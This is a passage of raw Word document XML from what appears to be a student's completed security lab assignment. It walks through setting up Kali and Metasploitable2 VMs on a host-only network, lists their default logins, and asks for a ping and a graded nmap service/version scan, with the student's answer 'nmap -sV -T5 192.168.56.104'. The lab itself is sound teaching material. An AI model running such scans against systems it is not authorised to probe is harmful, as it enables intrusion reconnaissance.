        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003F53B6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Once</w:t>
      </w:r>
      <w:r w:rsidR="00097140">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> this has been done, the IPv4 Address/Mask field </w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>should display as 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>56</w:t>
      </w:r>
      <w:r w:rsidRPr="00F337B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1/24.</w:t>
      </w:r>
      <w:r w:rsidR="0007796E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3532984E" w14:textId="65DD903D" w:rsidR="00F337B0" w:rsidRDefault="00CB0782" w:rsidP="00F337B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783AFB19" wp14:editId="3C5EA5E0">
            <wp:extent cx="5943600" cy="13658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1365885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="643DF55F" w14:textId="418CDC0C" w:rsidR="00FE214E" w:rsidRDefault="00225BB9" w:rsidP="00F337B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B83919">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BC28E1" w14:textId="77777777" w:rsidR="00CB0782" w:rsidRDefault="00926368" w:rsidP="00F337B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF179D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Next, go to the network settings for your</w:t>
      </w:r>
      <w:r w:rsidR="00CB0782">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF179D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM (</w:t>
      </w:r>
      <w:r w:rsidRPr="00926368">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Settings -&gt; Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF179D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A47717" w:rsidRPr="00DF179D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Make sure that </w:t>
      </w:r>
      <w:r w:rsidR="00A47717" w:rsidRPr="005264AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Adapter 1</w:t>
      </w:r>
      <w:r w:rsidR="00A47717" w:rsidRPr="005264AA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A47717" w:rsidRPr="00DF179D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">is enabled, that it is attached to </w:t>
      </w:r>
      <w:r w:rsidR="00A47717" w:rsidRPr="00A47717">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Host-only Adapter</w:t>
      </w:r>
      <w:r w:rsidR="00A47717" w:rsidRPr="00DF179D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, and that its name matches the name of the host network interface that you just created (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A47717" w:rsidRPr="00DF179D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A47717" w:rsidRPr="00DF179D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VirtualBox Host-Only Ethernet Adapter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDE04C0" w14:textId="77777777" w:rsidR="00CB0782" w:rsidRDefault="00CB0782" w:rsidP="00F337B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0628B128" w14:textId="77777777" w:rsidR="004C7BA4" w:rsidRDefault="00CB0782" w:rsidP="00F337B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeat this for your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasplo</w:t>
      </w:r>
      <w:r w:rsidR="00F02A4A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>able</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM, so that is also connected to the same host network interface.</w:t>
      </w:r>
      <w:r w:rsidR="004E141E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C7BA4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004C7BA4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004E141E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Once you have done this, start both VMs</w:t>
      </w:r>
      <w:r w:rsidR="004C7BA4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The default username on your Kali VM is </w:t>
      </w:r>
      <w:r w:rsidR="004C7BA4" w:rsidRPr="004C7BA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidR="004C7BA4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the password is </w:t>
      </w:r>
      <w:r w:rsidR="004C7BA4" w:rsidRPr="004C7BA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidR="004C7BA4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The default username on your Metasploitable2 VM is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C7BA4" w:rsidRPr="004C7BA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C7BA4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the password is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C7BA4" w:rsidRPr="004C7BA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C7BA4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5085E2" w14:textId="67DB7FE1" w:rsidR="000C561F" w:rsidRPr="00BA67E1" w:rsidRDefault="00130014" w:rsidP="000C561F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r w:rsidR="008E0ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM</w:t>
      </w:r>
      <w:r w:rsidR="00F651C4" w:rsidRPr="00BA67E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00E85FDB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="001E579F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00F651C4" w:rsidRPr="00BA67E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBDB98B" w14:textId="29145837" w:rsidR="000C561F" w:rsidRDefault="000C561F" w:rsidP="00536ED7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C8905B5" w14:textId="7A64667D" w:rsidR="00B539BC" w:rsidRDefault="00B539BC" w:rsidP="00536ED7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Open a terminal on the Kali VM and on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM. Use a command to look up the IP address of the eth0 interface on each VM. Then, answer the question below. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC2B85" w14:textId="78BCB8AD" w:rsidR="00B539BC" w:rsidRDefault="00B539BC" w:rsidP="00536ED7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E0803F" w14:textId="5983269C" w:rsidR="00F57A30" w:rsidRDefault="00B539BC" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B539BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to show a successful network connection from the Kali VM to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM. Provide a screenshot of this below.</w:t>
      </w:r>
      <w:r w:rsidR="00130014">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 pts)</w:t>
      </w:r>
      <w:r w:rsidR="00AB013F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00933326">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A84255D" wp14:editId="1A71762B">
            <wp:extent cx="3441700" cy="1409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1700" cy="1409700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00AB013F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB013F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000707D6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Kali VM, use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000707D6" w:rsidRPr="000707D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000707D6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to start the Metasploit framework console. Then, run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000707D6" w:rsidRPr="000707D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000707D6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command from the Metasploit console to perform a port scan of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000707D6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000707D6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM. </w:t>
      </w:r>
      <w:r w:rsidR="00B60985">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You will need to provide a flag(s) to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B60985" w:rsidRPr="00B60985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B60985">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command which</w:t>
      </w:r>
      <w:r w:rsidR="00B60985" w:rsidRPr="00B60985">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B60985">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>can detect the services that are listening on each port as well as their versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8BC1F1" w14:textId="76E79E80" w:rsidR="00035C4B" w:rsidRDefault="00035C4B" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7111F8A7" w14:textId="77777777" w:rsidR="00E85FDB" w:rsidRDefault="0056491B" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. What is the full </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0056491B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command that you ran? </w:t>
      </w:r>
      <w:r w:rsidR="00130014">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(5 pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727B673D" w14:textId="77777777" w:rsidR="004720CC" w:rsidRDefault="00D970F4" w:rsidP="00743D4E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1930"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00D970F4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>map -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D970F4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D970F4">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T5 192.168.56.104</w:t>
      </w:r>
      <w:r w:rsidR="00AB013F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AB013F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0056491B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00035C4B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Provide a screenshot below </w:t>
      </w:r>
      <w:r w:rsidR="0056491B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00035C4B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00035C4B" w:rsidRPr="00345599">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00035C4B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
      <w:r w:rsidR="0056491B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, showing at least 5 different services (and their versions) that are listening on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0056491B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
